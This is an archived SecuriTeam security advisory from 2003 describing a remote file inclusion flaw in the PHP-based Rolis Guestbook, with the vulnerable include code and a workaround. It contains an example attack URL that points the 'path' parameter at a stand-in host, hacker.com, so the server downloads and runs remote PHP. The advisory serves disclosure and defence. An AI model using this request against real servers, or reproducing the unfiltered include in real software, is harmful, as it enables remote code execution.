[UNIX] Rolis Guestbook Allows Code Injection

From: SecuriTeam (support_at_securiteam.com)
Date: 11/18/03

  • Next message: SecuriTeam: "[UNIX] phpWebFileManager Directory Traversal Vulnerability"
    To: list@securiteam.com
    Date: 18 Nov 2003 13:52:51 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Rolis Guestbook Allows Code Injection
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.roli.at> Rolis Guestbook is "a simple to use PHP based
    Guestbook", a vulnerability in the product allows remote attackers to
    insert malicious PHP code into the product, allowing remote attackers to
    execute arbitrary code.

    DETAILS

    Vulnerable code:
    Because the script:
    <?php
      include ($path . "data.inc.php");
      include ($path . "header.inc.php");
      include($path . "connection_data.inc.php");
      [ scip ]

    Does not verify that $path arrives from the user, nor does it filter it
    for arbitrary values, requesting such a URL as:
    http://www.site.com/rolis_book_path/insert.inc.php?path=http://hacker.com/

    Will cause the program to download the following files,
    http://hacker.com/data.inc.php, http://hacker.com/header.inc.php, and
    http://hacker.com/connection_data.inc.php from the remote server, and
    execute the code inside them.

    Workaround:
    Edit insert.inc.php:
     <?php
      include ("path.inc.php"); <-- insert this line
      include ($path . "data.inc.php");
      ...

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:r00t@rsteam.ru> r00t.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] phpWebFileManager Directory Traversal Vulnerability"

    Relevant Pages

    • [UNIX] Multiple Vulnerabilities within PHP 4/5 (pack, unpack, safe_mode_exec_dir, safe_mode, realpat
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP is "a widely-used general-purpose scripting language that is ... several vulnerabilities within PHP were ... unserialize() - Wrong Handling of Negative References ...
      (Securiteam)
    • [UNIX] Dotdeb PHP Email Header Injection Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Dotdeb PHP Email Header Injection Vulnerability ... This patch adds an X-PHP-Script header to ...
      (Securiteam)
    • [NEWS] PHP getimagesize() Multiple DoS Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP is a widely-used general-purpose scripting language that is especially ... Remote exploitation of a denial of service condition in the PHP ... Local exploitation of an input validation vulnerability in The PHP Group's ...
      (Securiteam)
    • [UNIX] PHP 5.1.6 / 4.4.4 Critical php_admin* Bypass by ini_restore()
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a privilage escalation vulnerability in PHP. ... Used to set a boolean configuration directive. ... can not be overridden by .htaccess or virtualhost directives. ...
      (Securiteam)
    • [UNIX] PHP Globals Filtering Bypass
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHP Globals Filtering Bypass ... Please note that the PHP globals must be on in order to be vulnerable. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)